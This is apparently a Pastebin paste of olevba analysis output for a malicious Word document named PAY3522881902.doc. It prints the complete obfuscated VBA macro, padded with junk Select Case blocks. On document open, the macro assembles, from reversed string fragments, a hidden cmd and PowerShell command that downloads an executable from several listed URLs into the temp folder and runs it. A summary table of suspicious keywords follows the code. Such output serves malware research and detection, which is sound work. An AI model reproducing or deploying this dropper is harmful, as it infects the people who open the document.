Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.53.1 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- XML:MAS-HB-- PAY3522881902.doc
- ===============================================================================
- FILE: PAY3522881902.doc
- Type: Word2003_XML
- -------------------------------------------------------------------------------
- VBA MACRO hqhjjf.cls
- in file: fplkakh - OLE stream: u'VBA/hqhjjf'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO tvfvpv.bas
- in file: fplkakh - OLE stream: u'VBA/tvfvpv'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Function ziilnp(zdwrhc)
- On Error Resume Next
- Select Case bofcsp
- Case 600812771
- zssvqbs = CStr(rfolwz)
- infpjz = CStr(fiuwjmh)
- Case 691931294
- qhplj = cufwqqj
- lcbfq = Hex(751111903)
- Case 693375610
- swkjiw = wiiwsh
- jiuaoso = Log(311238894)
- End Select
- Select Case qvkomu
- Case 676369523
- wvhzs = CStr(sffmkpj)
- zwfzq = CStr(maljh)
- Case 613766996
- tljjc = jjqcvpt
- opopw = Hex(446181185)
- Case 540556815
- qvwhtl = dtwfas
- nzjoo = Log(576824669)
- End Select
- ziilnp = ziilnp(Interaction.Shell(zdwrhc, vbHide))
- Select Case rmwhcfv
- Case 974865143
- wazknzq = CStr(jvdnm)
- jzvuil = CStr(ltmph)
- Case 351660802
- mffqwz = djhiwo
- onwvdm = Hex(505454459)
- Case 428217029
- wtkadzs = ihdpjs
- bizczv = Log(97188184)
- End Select
- Select Case vzikii
- Case 10094025
- zinijwl = CStr(hhlwaab)
- bzlwk = CStr(haviaql)
- Case 120219471
- njown = ciqfzzi
- zwjjbt = Hex(433952710)
- Case 593322741
- qfvqwib = valovm
- lnjbn = Log(997944764)
- End Select
- End Function
- Function uhdurz()
- On Error Resume Next
- Select Case zjuzb
- Case 651074479
- wlqiizi = CStr(ntzpi)
- wwvdi = CStr(kdjvpfw)
- Case 671514377
- jtbljan = itkol
- obfui = Hex(750134488)
- Case 546116158
- aciof = qzfkivp
- kddca = Log(596811730)
- End Select
- Select Case cfjao
- Case 593264307
- jcvczuz = CStr(qiihtnl)
- fuicmm = CStr(iizks)
- Case 577819856
- whmapk = ojvaaj
- owkduhq = Hex(343387171)
- Case 532704773
- pbjzpc = fwkauto
- rnhzp = Log(159823366)
- End Select
- Select Case ikzcjlj
- Case 186720771
- dadkv = CStr(mdfzjv)
- sjortas = CStr(irrmrm)
- Case 290733999
- nfzji = jiwvuwp
- rcrmq = Hex(299208236)
- Case 413633318
- fdwzur = bhjai
- znsuwtj = Log(97971969)
- End Select
- zwrqd = "c:\on" + "jzi" + "oi\" + "izwolr" + "\poic" + "wo\" + "..\" + "..\"
- Select Case imnnmlq
- Case 657311520
- vplwbfw = CStr(dkpfk)
- wpvhv = CStr(ikikp)
- Case 377391150
- rqquiz = mzvpn
- jcakpb = Hex(842868626)
- Case 917075856
- ljmtvh = tswpq
- pjiha = Log(887826165)
- End Select
- Select Case bplrsj
- Case 390830559
- aoszmt = CStr(udwqzbz)
- jzrjili = CStr(tiwnsj)
- Case 685861623
- faktn = wfbub
- ptzkaj = Hex(695931034)
- Case 118546816
- waiwhl = zvubonl
- mjcwl = Log(189235512)
- End Select
- Select Case olwuij
- Case 826871904
- iricqz = CStr(dtiaa)
- zkshmw = CStr(wbkazvm)
- Case 332408334
- tntndif = sdmoo
- utrnhs = Hex(191517275)
- Case 850588106
- fwajq = chcqmh
- irkrk = Log(491761373)
- End Select
- szrtncm = "..\win" + "dow" + "s\sys" + "tem32\" + "cmd." + "exe /c" + " %Pro" + "gram"
- Select Case faohs
- Case 908149485
- awpvj = CStr(ttbnjik)
- ciawam = CStr(qbnnw)
- Case 420402030
- fwlqj = huumw
- wudaij = Hex(897070920)
- Case 795415583
- jiiill = wjbmzj
- jscjaq = Log(802506421)
- End Select
- Select Case javltk
- Case 317235101
- zkfis = CStr(uwqbmcv)
- ckmczd = CStr(isborn)
- Case 819664492
- ufvsmv = wpwwcif
- qavai = Hex(782638170)
- Case 544420602
- ajidkvj = puqpo
- znznjo = Log(854904267)
- End Select
- Select Case znpzq
- Case 938372558
- osisc = CStr(nnoihc)
- iqwrz = CStr(qjwnqf)
- Case 945277675
- towois = tjopzr
- zljiu = Hex(251702736)
- Case 502602857
- cvtps = qaksfm
- skwpjw = Log(715727198)
- End Select
- uvkplhz = "Data" + ":~0,1" + "%%Pro" + "gra" + "mData:" + "~9," + "2% /" + "V:ON/" + "C" + Chr(34) + "set"
- Select Case tkitrcj
- Case 605073901
- rawki = CStr(sdsbpbw)
- kuhzl = CStr(qzhztbw)
- Case 396135033
- zrzcun = ksqwi
- clrpi = Hex(430205498)
- Case 818195361
- imwmcq = vwijs
- jmwbaa = Log(740889196)
- End Select
- Select Case rsmvtj
- Case 252211316
- bqhtff = CStr(qnsiwcl)
- fbvusr = CStr(qwhawi)
- Case 784985357
- zdvuw = tnjojvp
- jbfjriz = Hex(806729510)
- Case 387709316
- jtrjw = fifqjzb
- hzdvh = Log(258795782)
- End Select
- oujod = " SiQ=;" + "'cjq" + "hpb'=" + "qijm" + "nd$}}" + "{hct" + "ac}};"
- Select Case ipzws
- Case 869383085
- nbotfjj = CStr(aintjj)
- qljpf = CStr(ztwzzwi)
- Case 468689836
- sakwfwu = hzihzj
- cllbhwp = Hex(790130775)
- Case 439606901
- fmwwzz = cflola
- cqmbqmf = Log(58390931)
- End Select
- Select Case ihpsllc
- Case 149828367
- nluuhlo = CStr(kmwiqp)
- qbzikw = CStr(cwsiucc)
- Case 221528524
- ponzt = cfkjc
- rbmct = Hex(589689532)
- Case 114557352
- wfnvpr = svqajw
- qcitt = Log(529267428)
- End Select
- kbuitlk = "kaerb" + ";'bchk" + "zfb'=" + "dqk" + "zr$" + ";hkjzj" + "lz$ me" + "tI-e" + "kovnI{"
- Select Case sqzcm
- Case 690864036
- rarqw = CStr(wdcds)
- jvaiiob = CStr(vcrqn)
- Case 365187461
- oonmvu = platvd
- wkichnz = Hex(953589513)
- Case 165068376
- ojssnit = qjkap
- datksz = Log(681539233)
- End Select
- Select Case haubrst
- Case 583381740
- fiqbka = CStr(lzslwwq)
- olrulk = CStr(bwbjzzw)
- Case 831193357
- ocbjjli = jvdwlsd
- oruti = Hex(96244825)
- Case 323112618
- pocwqbz = mibjqiq
- wwprt = Log(729576601)
- End Select
- Select Case mihdzi
- Case 248104702
- hlcsq = CStr(uhrzdfv)
- lilsb = CStr(jllba)
- Case 20555113
- tljhf = ldnimsu
- mvcoz = Hex(811222811)
- Case 445373267
- fvjivt = liswojq
- hitfnmf = Log(156020954)
- End Select
- bjzzhsa = " )00" + "004 eg" + "- htg" + "nel.)h" + "kjzjlz" + "$ m" + "etI-t" + "eG((" + " fI;'"
- uhdurz = zwrqd + szrtncm + uvkplhz + oujod + kbuitlk + bjzzhsa
- End Function
- Function jitovh()
- On Error Resume Next
- Select Case invjf
- Case 727655255
- iijlih = CStr(scwbqj)
- zakrjut = CStr(miwkkzs)
- Case 746881432
- vkocsjn = uzowczk
- cznpf = Hex(771796289)
- Case 697298915
- zifjhv = nlwsiv
- juzft = Log(473725068)
- End Select
- Select Case fnfbit
- Case 194764856
- vrcjjz = CStr(vzzknk)
- ainavz = CStr(zvlkwh)
- Case 461205691
- lvdnj = qvzcm
- dakilrc = Hex(548853005)
- Case 832795361
- lnndqon = cpbcu
- kacmzz = Log(147226609)
- End Select
- Select Case sfbal
- Case 733883904
- nujupq = CStr(mwqzs)
- chsmk = CStr(vfvqf)
- Case 426576943
- bdsjnn = wnajhsc
- jawstj = Hex(533303914)
- Case 793893060
- bwwkzqi = hiwrbk
- jqvdcqi = Log(986645497)
- End Select
- hzipdp = "jrkj" + "ik'=ci" + "ikdj$" + ";)hkjz" + "jlz$" + " ,qjc" + "aki$(" + "eliFd" + "aoln"
- Select Case sbujhik
- Case 161235603
- uwrjbja = CStr(fzsru)
- rbmiqpa = CStr(qabkuk)
- Case 800713382
- vzhqw = ckjuaj
- nrispbf = Hex(839871821)
- Case 695648356
- jwcouc = zomadj
- ftfmja = Log(162427898)
- End Select
- Select Case nqiau
- Case 841013738
- tappzcj = CStr(uvlurpq)
- cipwtar = CStr(twiwjzu)
- Case 233632313
- umvzjvk = mwbskwt
- zhozi = Hex(143053077)
- Case 615797862
- vlnalj = khlibjj
- csita = Log(639509195)
- End Select
- Select Case rzlpu
- Case 32112561
- qqmpj = CStr(lljvufi)
- vnlqt = CStr(nfjwch)
- Case 213044316
- zojpo = nwpjv
- cibhuh = Hex(589050347)
- Case 965762530
- jwjzbsd = uzrcips
- timotsi = Log(613891436)
- End Select
- wcwhr = "woD.ir" + "hwidj" + "${yrt" + "{)ujb" + "wa$ " + "ni qj" + "cak" + "i$(h"
- Select Case tnzmwij
- Case 59011220
- oukoib = CStr(bqfpz)
- mdtzq = CStr(vcwpoi)
- Case 998193427
- knvtcj = pbuvio
- ajminb = Hex(712235165)
- Case 314281124
- iqsmzis = bbfijpj
- jqnntz = Log(539377363)
- End Select
- Select Case ktrltv
- Case 272956420
- rrodrd = CStr(izrnt)
- afbwwvk = CStr(waaih)
- Case 210932257
- asvozl = pjcnf
- mvloui = Hex(607874576)
- Case 786268864
- nfqcz = tdmalha
- uilibvz = Log(366933975)
- End Select
- Select Case awrlqj
- Case 438305910
- lrzhhzp = CStr(pkiidwz)
- znhpscr = CStr(hqztddz)
- Case 651500018
- jtnpail = wtvlj
- bmvwvq = Hex(865310766)
- Case 957769503
- wvhaimi = ikwhh
- joflith = Log(608507954)
- End Select
- rmflwpm = "caero" + "f;'" + "exe.'" + Chr(43) + "zbw" + "nifi$" + Chr(43) + "'\'" + Chr(43) + "pmet" + ":vne"
- Select Case fwkzz
- Case 404985518
- bzwdf = CStr(nzfosqn)
- swzdmpi = CStr(zijhprr)
- Case 660105813
- iioqiwp = qikrsn
- kkolr = Hex(793657216)
- Case 296505172
- ojhnz = vasdfvi
- vlrmm = Log(655593344)
- End Select
- Select Case rotpzzi
- Case 668736254
- sbraq = CStr(nvbzc)
- iimhzs = CStr(zwrcc)
- Case 114285580
- uhaupm = flrht
- pjihvnz = Hex(687972536)
- Case 933004086
- isjnic = jscnv
- icnbi = Log(329954406)
- End Select
- Select Case pqluz
- Case 435043571
- qwndn = CStr(rvjdv)
- utwznb = CStr(kzhwmf)
- Case 372896008
- njmjht = fjiqqjv
- wswbz = Hex(435811681)
- Case 499949277
- pvqazi = podfmzi
- rnvur = Log(467248416)
- End Select
- wuvcz = "$=hkj" + "zjlz" + "$;'ziw" + "mvv'=p" + "zrifo"
- Select Case fvliijs
- Case 729559888
- ffhlfil = CStr(jdfdbqb)
- hcrlq = CStr(okzfmz)
- Case 60316120
- imjwoik = tqarkr
- nldju = Hex(563921498)
- Case 831731278
- tojklb = wduiqw
- wzvjw = Log(19720903)
- End Select
- Select Case zodhipq
- Case 86057636
- vqvmq = CStr(jfcpbn)
- ahdktj = CStr(uttohz)
- Case 879292416
- rvkjq = kwjjud
- qriin = Hex(686146673)
- Case 676995733
- fbtzlhh = hkrbij
- zzcrqr = Log(889274662)
- End Select
- kqwok = "h$;'9" + "04' = " + "zbw" + "nifi$;" + "'sc" + "jmbw'" + "=fm" + "sqvii$" + ";)'@"
- Select Case waztl
- Case 103857594
- tzukwv = CStr(urfhjs)
- hdnjl = CStr(cjiwt)
- Case 726074663
- mdzadbh = fpzpo
- jhulipz = Hex(937939839)
- Case 49807578
- inwqtjz = mrqdz
- avtro = Log(100731115)
- End Select
- Select Case pwsciiz
- Case 73524463
- cwqhfqi = CStr(dwvjmoo)
- mjonoz = CStr(bomdzor)
- Case 378234512
- ucwtw = awumjo
- jpuipk = Hex(708624436)
- Case 587071942
- tzqfhi = mumsth
- oawlu = Log(37079116)
- End Select
- Select Case iklohk
- Case 145145674
- mbwjdlm = CStr(crccp)
- audfjrv = CStr(hwkwww)
- Case 196271219
- jtwjcc = jjolbu
- jqawpv = Hex(227947190)
- Case 69191054
- mccjdmm = parra
- hlibfii = Log(325875480)
- End Select
- wzkwjw = "'(t" + "ilpS" + ".'41" + "fpege" + "LDa"
- Select Case iicln
- Case 242684325
- camzmf = CStr(ickavw)
- mrwapiv = CStr(vbwvior)
- Case 553977312
- trsaqm = ppjhk
- zwkzbw = Hex(166971722)
- Case 311931110
- dirvos = jtauqfn
- jplnr = Log(137350181)
- End Select
- Select Case njbkzla
- Case 223873762
- czwnzpw = CStr(ciwkwh)
- nvnfn = CStr(qmuai)
- Case 979711325
- ctazfik = lwtmq
- crdmk = Hex(472704122)
- Case 752112140
- vzkuw = djurwk
- dwitpwo = Log(972119405)
- End Select
- hrzqojk = "jCgKn" + "c/mo" + "c.sse" + "nisub" + "rusoh."
- Select Case iqickj
- Case 60470769
- rvttw = CStr(lrtrtm)
- dpjol = CStr(wacasr)
- Case 561513611
- spjsra = zkskrwu
- fwvzmvi = Hex(153708357)
- Case 958252290
- zutwzd = ffldz
- biciii = Log(305464523)
- End Select
- Select Case wjjovs
- Case 934211678
- fpmdj = CStr(iduzj)
- zcjjdtv = CStr(apmdmsn)
- Case 759037756
- dmtjjh = zjwrbk
- mlmui = Hex(267803094)
- Case 11408907
- nwksqp = zihjwdw
- zzzin = Log(101734684)
- End Select
- Select Case dhjvrq
- Case 527978684
- jdsilzm = CStr(sualiju)
- fawwf = CStr(hnozoa)
- Case 866937853
- wajbjrq = ikksd
- zphhd = Hex(301298614)
- Case 915187427
- ilzjisz = finquoj
- wwbpkow = Log(575711404)
- End Select
- zpftzo = "www//:" + "ptth@" + "Mw6O6" + "3Df_" + "Cm066C" + "cdkU" + "7o/moc"
- jitovh = hzipdp + wcwhr + rmflwpm + wuvcz + kqwok + wzkwjw + hrzqojk + zpftzo
- End Function
- Function wwiqv()
- On Error Resume Next
- Select Case tidca
- Case 830446908
- idmic = CStr(oznki)
- swtrswc = CStr(ldiiiw)
- Case 889023774
- mhuur = rmukitf
- lijid = Hex(432259758)
- Case 13823040
- aazhcs = fsszwji
- lichr = Log(927158745)
- End Select
- Select Case kjndcjn
- Case 92073690
- jjjzpvf = CStr(pbrwtud)
- wmbohdp = CStr(zjwbw)
- Case 502615577
- zfwwkh = jtskt
- kqdhwvb = Hex(104590109)
- Case 320271609
- fwwndin = wzwnfkh
- wfjqko = Log(441363858)
- End Select
- Select Case jkjoja
- Case 190331288
- wawuz = CStr(wkiipu)
- lzkkko = CStr(ikfabth)
- Case 603785243
- oqtwhj = wctjao
- djpuurr = Hex(210092278)
- Case 744804014
- miccoh = ruosd
- sbbvjrw = Log(200920612)
- End Select
- rnncbhd = ".ai" + "cizy" + "hp.ww" + "w//:pt" + "th@j" + "7OEo_7"
- Select Case wbptwod
- Case 996556683
- srmucjf = CStr(btuiq)
- nunkqj = CStr(jcwqdra)
- Case 635244882
- qhcchn = nmzcwwl
- jlbfj = Hex(943244812)
- Case 748765757
- kpnpact = bjlma
- vjuifzi = Log(661141958)
- End Select
- Select Case zbpnc
- Case 294983728
- jcazm = CStr(akuinnm)
- zojriw = CStr(dddpv)
- Case 244000242
- fwhwh = qoqsm
- nncfqnb = Hex(734890903)
- Case 892768189
- rtiij = faiqf
- ckpdo = Log(207868360)
- End Select
- Select Case bohvcq
- Case 297394134
- sikobzv = CStr(qkuqdq)
- acqrhwz = CStr(piujpf)
- Case 262906575
- jizmj = zsstkkr
- pfzik = Hex(375755504)
- Case 436846103
- irbkaf = cjjzo
- thfhtci = Log(492303871)
- End Select
- zihij = "MhAbZ" + "p6jnH" + "p/z" + "t.oc.s" + "keeg"
- Select Case irfnp
- Case 8972288
- ttikrv = CStr(nscuatj)
- likbtrl = CStr(ommsnw)
- Case 857167585
- jmjdwi = iojcokj
- vsnab = Hex(739267040)
- Case 523021341
- unvij = izjkhj
- tiwqizb = Log(100486401)
- End Select
- Select Case vstqjin
- Case 666789842
- wcwnlf = CStr(srodb)
- cnqkphz = CStr(wzzbq)
- Case 713323677
- mzzsz = vcmidir
- shrzj = Hex(914656858)
- Case 187532285
- tpojql = irdpf
- zpmvq = Log(419456124)
- End Select
- Select Case zathhij
- Case 710569142
- inthdjr = CStr(kvifwk)
- wdwlhb = CStr(kqavnbp)
- Case 168049444
- lnbzbzz = wvuuz
- jphlwl = Hex(524707660)
- Case 591591531
- rjzjfzv = ilzbbmw
- wqvck = Log(868396195)
- End Select
- dwpit = "t.liam" + "//:" + "ptt" + "h@8or1" + "uzsd" + "Z8vi" + "e/RXI/" + "sed" + "ulcni-"
- Select Case mailww
- Case 64654464
- khjbmsu = CStr(tnaczr)
- nasci = CStr(uisjk)
- Case 770507689
- jtkiv = duasvzl
- rzokb = Hex(640749667)
- Case 683677235
- ahdzo = dfuioi
- qwwcpli = Log(373484190)
- End Select
- Select Case rjnsnsz
- Case 212700167
- nlbwmw = CStr(iovjd)
- vmufifb = CStr(ajzwii)
- Case 255301803
- jvnzhuk = iizlduz
- dzzdl = Hex(555925509)
- Case 594165442
- wzzdi = uzjwiz
- itoop = Log(243641417)
- End Select
- wccvfj = "pw/moc" + ".srev" + "ireht" + "ybkram" + "dnal//" + ":ptth" + "@R8Fd3"
- Select Case zkrwhfv
- Case 853820249
- aunfuj = CStr(jzzil)
- pnwjwr = CStr(srdvi)
- Case 333800008
- lhuotw = wspnb
- znnrswm = Hex(497156364)
- Case 910759385
- vnqodv = mwrprs
- kicvfrw = Log(167213668)
- End Select
- Select Case pifqi
- Case 913967665
- asdowm = CStr(zzhai)
- ntzznf = CStr(osbsn)
- Case 659129367
- tpwhlzi = tsmuui
- srwia = Hex(346465998)
- Case 161496663
- owuunj = okiziol
- tnzmu = Log(387670727)
- End Select
- zuvtjrq = "N9U" + "mbY" + "BzI/te" + "n.en" + "onil"
- Select Case cfdpw
- Case 157657867
- mzjwjaf = CStr(bmzzpm)
- ckzhw = CStr(fwippw)
- Case 875690176
- njnmzh = wfqcoj
- kkwtolq = Hex(641755219)
- Case 808556543
- rqdsin = fwjhuk
- rriqn = Log(803891334)
- End Select
- Select Case brbzbpa
- Case 280379924
- wrultz = CStr(zlldbl)
- jzzimn = CStr(umpkb)
- Case 561670389
- dafbv = ubwwzoz
- ztiajc = Hex(31271413)
- Case 420034265
- qjhpjkm = afzni
- hprjo = Log(872363823)
- End Select
- Select Case ciuiaiq
- Case 614851345
- cojob = CStr(rdikm)
- tznzlwm = CStr(zionuu)
- Case 33109389
- wdlwtl = iaolk
- zocurij = Hex(596053408)
- Case 989051946
- jmshz = zoimvd
- ioloio = Log(693385641)
- End Select
- afactw = "etoh." + "www/" + "/:ptt" + "h'=ujb" + "wa$;" + "tnei"
- Select Case zvzibwm
- Case 217515817
- hjurzs = CStr(chaputt)
- kuwqjm = CStr(pfkcc)
- Case 584658894
- uwnswoi = votjai
- kblztb = Hex(757692337)
- Case 179645859
- mdvas = avjzpvl
- kwwwo = Log(47699818)
- End Select
- Select Case bmosu
- Case 123582486
- pikjw = CStr(okinm)
- ibksds = CStr(ihbsjw)
- Case 170839978
- bmzsvo = faafwv
- pdnhba = Hex(124476549)
- Case 642692664
- cifzdjq = attnms
- sqiklzf = Log(624238043)
- End Select
- Select Case qfbwmti
- Case 646021948
- zzjmju = CStr(wpzjtz)
- qwajd = CStr(bkjqjn)
- Case 594685115
- jakuj = jwlviz
- bofdjq = Hex(570468143)
- Case 287229143
- ibwic = mzcto
- wntmr = Log(526440517)
- End Select
- worhm = "lCbeW." + "teN t" + "cejbo-" + "wen" + "=ir" + "hwidj$" + ";'imsi"
- Select Case cjdopdr
- Case 748317805
- qmjbtbo = CStr(swjbuij)
- zbwro = CStr(omwuzd)
- Case 314271822
- ifizft = ojuwf
- jonuzw = Hex(926512063)
- Case 930029030
- fppzuo = qlzbo
- podfw = Log(584425560)
- End Select
- Select Case ikubu
- Case 200124936
- izzpcq = CStr(hdsvbju)
- kzrvu = CStr(pjmizz)
- Case 51538358
- wczcubk = wujzbz
- zkhoooi = Hex(502029173)
- Case 979922055
- fwhcl = juzji
- jvwcsi = Log(486507609)
- End Select
- Select Case ivjtw
- Case 578682315
- fifuff = CStr(pkvljl)
- ashww = CStr(inhflk)
- Case 901130507
- qvhqn = fborfbu
- vatdhqr = Hex(697535805)
- Case 730401405
- zacir = ulijscu
- jvjhtjl = Log(609129862)
- End Select
- vaipzq = "zuu'=i" + "ijir" + "wb$ ll" + "%1,3-~" + ":PME" + "T%h%" + "1,4-" + "~:EMA" + "NNOI"
- Select Case jwslbc
- Case 476137824
- qljmff = CStr(fjpjzia)
- vrsiqcw = CStr(kwaajh)
- Case 280424946
- kjlnqw = fpkiors
- vwfaj = Hex(457148718)
- Case 246754110
- dziwhzo = jfiavi
- ivfwfhr = Log(106387615)
- End Select
- Select Case jiznir
- Case 236606939
- ntuiw = CStr(fpmuiw)
- cmpzbha = CStr(csuuz)
- Case 608413170
- jpcrji = nuznoc
- zlsbhau = Hex(522365909)
- Case 622999575
- dzrjz = ziijwh
- omcqma = Log(380863876)
- End Select
- zcdjvo = "SSES%r" + "%1,5~" + ":CILB" + "UP%wo" + "p&&" + "for /"
- Select Case lzodb
- Case 330711018
- lawwzw = CStr(pnjasm)
- jnwikh = CStr(ozvswqd)
- Case 980420970
- uraiom = aosmozd
- nljbdji = Hex(301357584)
- Case 916774054
- pzkhjcs = zzkwoh
- blvputp = Log(523245620)
- End Select
- Select Case auamwb
- Case 780413258
- uijjkw = CStr(cwjjjbj)
- iqzqh = CStr(qukthc)
- Case 516998044
- wcitz = qwvcif
- ukzwdka = Hex(487450889)
- Case 660401141
- qlqkzjw = zcjajj
- mkilzsz = Log(900176858)
- End Select
- vwqmd = "L %h i" + "n (65" + "7,-1" + ",0)" + "do s" + "et " + "nu=!"
- Select Case pfzzrfi
- Case 950621216
- nuwkb = CStr(rorwk)
- wbtjq = CStr(pnvtkhu)
- Case 296306065
- kppmn = jafirc
- pqapm = Hex(947368391)
- Case 313558264
- whdqr = jlpmva
- lidpjk = Log(894441130)
- End Select
- Select Case klqzr
- Case 189225441
- dojhjsj = CStr(kwsqjh)
- zovql = CStr(hpzmk)
- Case 953292059
- qcldlia = tuojwm
- fzsqk = Hex(150988407)
- Case 709290285
- auuwc = zbnvdav
- mwqrrk = Log(119461590)
- End Select
- Select Case hbhqi
- Case 431922369
- azbir = CStr(oophw)
- krakjqi = CStr(czbup)
- Case 318597974
- pjzjfr = jhicdvb
- rppti = Hex(665703797)
- Case 704210128
- wkqzmfp = rwqfaon
- zhzhwp = Log(486531435)
- End Select
- tlpisj = "nu!!S" + "iQ:~" + "%h," + "1!&" + "&if %h" + " eq" + "u 0 e" + "cho !n"
- Select Case hlifb
- Case 501068774
- fqhrw = CStr(snhpaws)
- dmccoc = CStr(wcufptf)
- Case 979747788
- jjmfhd = zwslh
- sbpkdm = Hex(141200089)
- Case 266566634
- unsctbp = jpdwfz
- cmfkvf = Log(633870568)
- End Select
- Select Case czczrio
- Case 272377945
- uffwboi = CStr(djciaci)
- qbkrdb = CStr(whkwmi)
- Case 847746410
- wldlibk = jaqbziu
- djdcdw = Hex(667847435)
- Case 687000752
- zrijzci = fmzzdj
- tukcc = Log(541222669)
- End Select
- Select Case ukppudz
- Case 483080270
- lurwnj = CStr(kujhii)
- lvmvcz = CStr(ijwjo)
- Case 195329045
- pknrzi = lfizm
- krisb = Hex(3353863)
- Case 37726502
- slqjih = cortr
- cvljwp = Log(169510572)
- End Select
- nsfmr = "u:~-6" + "58!|" + " cmd" + Chr(34) + " "
- wwiqv = rnncbhd + zihij + dwpit + wccvfj + zuvtjrq + afactw + worhm + vaipzq + zcdjvo + vwqmd + tlpisj + nsfmr
- End Function
- Sub autoopen()
- fjnzjw = ziilnp(uhdurz + jitovh + wwiqv)
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO cssonjz.frm
- in file: fplkakh - OLE stream: u'VBA/cssonjz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | AutoExec | autoopen | Runs when the Word document is opened |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings (use option --deobf to |
- | | | deobfuscate) |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | vbHide | May run an executable file or a system |
- | | | command |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Hex String | i3ua | 69337561 |
- | Hex String | gciR | 67636952 |
- | Hex String | Wh$f | 57682466 |
- | Hex String | PTTE | 50545445 |
- | Hex String | C9Rq | 43395271 |
- | Hex String | Y3"t | 59332274 |
- | Hex String | Y2d0 | 59326430 |
- | Hex String | A631 | 41363331 |
- | Hex String | hXab | 68586162 |
- | Hex String | TD ` | 54442060 |
- | Hex String | 8w 1 | 38770931 |
- | Hex String | X9 1 | 58390931 |
- | Hex String | DSs& | 44537326 |
- | Hex String | rvU% | 72765525 |
- | Hex String | iVH5 | 69564835 |
- | Hex String | #621 | 23363231 |
- | Hex String | !0D1 | 21304431 |
- | Hex String | ')VB | 27295642 |
- | Hex String | ! 2% | 21093225 |
- | Hex String | `xtW | 60787457 |
- | Hex String | y6W! | 79365721 |
- | Hex String | hyrS | 68797253 |
- | Hex String | CPCW | 43504357 |
- | Hex String | FrHA | 46724841 |
- | Hex String | `1a | 60316120 |
- | Hex String | V9!I | 56392149 |
- | Hex String | haFg | 68614667 |
- | Hex String | r`tf | 72607466 |
- | Hex String | sRDc | 73524463 |
- | Hex String | 2XuH | 32587548 |
- | Hex String | U9w1 | 55397731 |
- | Hex String | "8sv | 22387376 |
- | Hex String | 0TdR | 30546452 |
- | Hex String | Ryxh | 52797868 |
- | Hex String | C"Yu | 43225975 |
- | Hex String | a | 20092061 |
- | Hex String | xh6 | 20786836 |
- | Hex String | 7WUP | 37575550 |
- | Hex String | R0!4 | 52302134 |
- | Hex String | q3#g | 71332367 |
- | Hex String | deDd | 64654464 |
- | Hex String | h6w# | 68367723 |
- | Hex String | UY%P | 55592550 |
- | Hex String | YAeD | 59416544 |
- | Hex String | $6AA | 24364141 |
- | Hex String | IqV6 | 49715636 |
- | Hex String | 8vpr | 38767072 |
- | Hex String | aHQ4 | 61485134 |
- | Hex String | Y`S@ | 59605340 |
- | Hex String | Rd@Q | 52644051 |
- | Hex String | XD%V | 58442556 |
- | Hex String | EqHq | 45714871 |
- | Hex String | R2Eb | 52324562 |
- | Hex String | 15X& | 31355826 |
- | Hex String | He1C | 48653143 |
- | Hex String | &efc | 26656663 |
- | Hex String | c8pV | 63387056 |
- | Hex String | fxGC | 66784743 |
- +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
